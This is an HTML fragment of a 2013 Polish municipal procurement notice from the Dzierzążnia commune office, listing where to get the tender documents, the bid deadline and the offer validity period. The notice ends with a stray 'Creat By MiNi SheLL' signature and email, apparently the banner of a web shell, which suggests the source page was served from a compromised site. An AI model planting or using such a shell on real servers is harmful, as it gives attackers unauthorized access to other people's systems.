<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://ugdzierzaznia.bip.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD GMINY W DZIERZĄŻNI
DZIERZĄŻNIA 28
09-164  DZIERZĄŻNIA.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.07.2013 godzina 10:00, miejsce: URZĄD GMINY W DZIERZĄŻNI
DZIERZĄŻNIA 28
09-164  DZIERZĄŻNIA
pok. nr 15 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com